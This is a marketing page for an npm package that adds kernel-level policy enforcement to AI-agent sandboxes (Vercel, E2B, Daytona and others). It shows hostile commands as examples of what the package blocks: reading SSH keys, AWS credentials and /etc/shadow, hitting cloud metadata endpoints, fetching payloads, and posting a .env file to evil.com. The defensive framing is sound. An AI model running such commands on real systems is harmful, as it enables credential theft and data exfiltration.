Your AI sandbox has no security layer.
This adds one.

AI agents run arbitrary code in your sandbox. Without enforcement at the OS level, a single prompt injection can exfiltrate credentials, access cloud metadata, or pivot to internal services.

Drop-in runtime security for Vercel, E2B, Daytona, Cloudflare, Blaxel, and Sprites sandboxes. One npm install, three lines of TypeScript.

$ npm install @agentsh/secure-sandbox copy
index.ts 
import { Sandbox } from '@vercel/sandbox';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Sandbox.create({ runtime: 'node24' });
const sandbox = await secureSandbox(adapters.vercel(raw));

await sandbox.exec('npm install express');  // allowed
await sandbox.exec('cat ~/.ssh/id_rsa');   // blocked
import Sandbox from '@e2b/code-interpreter';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Sandbox.create();
const sandbox = await secureSandbox(adapters.e2b(raw));

await sandbox.exec('pip install pandas');    // allowed
await sandbox.exec('cat ~/.aws/credentials'); // blocked
import { Daytona } from '@daytonaio/sdk';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await new Daytona().create();
const sandbox = await secureSandbox(adapters.daytona(raw));

await sandbox.exec('node server.js');        // allowed
await sandbox.exec('curl http://169.254.169.254/'); // blocked
import { Container } from '@cloudflare/containers';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Container.create();
const sandbox = await secureSandbox(adapters.cloudflare(raw));

await sandbox.exec('npm run build');          // allowed
await sandbox.exec('sudo apt install nmap');  // blocked
import { SandboxInstance } from '@blaxel/sandbox';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await SandboxInstance.create();
const sandbox = await secureSandbox(adapters.blaxel(raw));

await sandbox.exec('python train.py');       // allowed
await sandbox.exec('env | grep SECRET');    // blocked
import { Sprite } from '@fly/sprites';
import { secureSandbox, adapters } from '@agentsh/secure-sandbox';

const raw     = await Sprite.create();
const sandbox = await secureSandbox(adapters.sprites(raw));

await sandbox.exec('cargo build --release');  // allowed
await sandbox.exec('cat /etc/shadow');          // blocked
Vercel Sandbox E2B Sandbox Daytona Sandbox Cloudflare Containers Blaxel Sandbox Sprites (Fly.io)

What it blocks

Every command runs through the policy engine. Dangerous operations are denied before they reach the kernel.

Credential Theft
$ cat ~/.ssh/id_rsa
denied: file policy blocks /home/*/.ssh/**
$ cat ~/.aws/credentials
denied: file policy blocks /home/*/.aws/**
Malicious Domains
$ curl https://afrfrancedns.com/payload.sh
denied: blocked by URLhaus threat feed
$ wget http://login-microsft-verify.com/steal
denied: blocked by Phishing.Database
Supply Chain Attacks
$ npm install colourama
blocked: typosquat detected (did you mean colorama?)
$ npm install [email protected]
blocked: critical vulnerability (CVE-2018-16396)
Data Exfiltration
$ curl -X POST https://evil.com -d @.env
denied: domain not on allowlist + DLP redacted secrets
$ curl http://169.254.169.254/latest/meta-data/
denied: metadata endpoints blocked
Privilege Escalation
$ sudo apt install nmap
denied: seccomp blocks sudo
$ env | grep SECRET
denied: env policy hides sensitive variables
Safe Operations
$ npm install express
ok: registry.npmjs.org is on the allowlist
$ cat /workspace/src/app.ts
ok: workspace files are readable

How it works

Built on agentsh, the open-source execution-layer security engine. A lightweight Go binary replaces /bin/bash inside the sandbox, routing every operation through kernel-level enforcement before it reaches the host.

Enforcement is synchronous and adds <1ms per command. No background daemons, no network round-trips.

Policy as code

Extend any preset with your own rules. Allow specific APIs, open file paths, restrict ports — all in TypeScript. See the policy docs →

policy.ts 
import { agentDefault } from '@agentsh/secure-sandbox/policies';

const policy = agentDefault({
  network: [
    { allow: ['api.stripe.com', 'api.openai.com'], ports: [443] }
  ],
  file: [
    { allow: '/data/**', ops: ['read', 'write'] }
  ],
});

const sandbox = await secureSandbox(adapters.e2b(raw), { policy });
agentDefault
Production AI agents. Allowlists registries, blocks credential files, restricts dangerous commands.
devSafe
Local development. Permissive network, workspace-focused file access.
ciStrict
CI/CD runners. Workspace-only access, restricted registries and commands.
agentSandbox
Untrusted code. No network, read-only workspace, heavily restricted.

Supported sandbox platforms

Built-in adapters for the major hosted AI sandbox providers. Each adapter maps the platform's SDK to the secure-sandbox interface with zero configuration.

One dependency. Three lines. Kernel-level protection.

Stop hoping your sandbox is safe. Know it is.

$ npm install @agentsh/secure-sandbox copy
Star on GitHub Read the docs →

MIT licensed. Built by Canyon Road.

Works great with the Vercel AI SDK — see the full example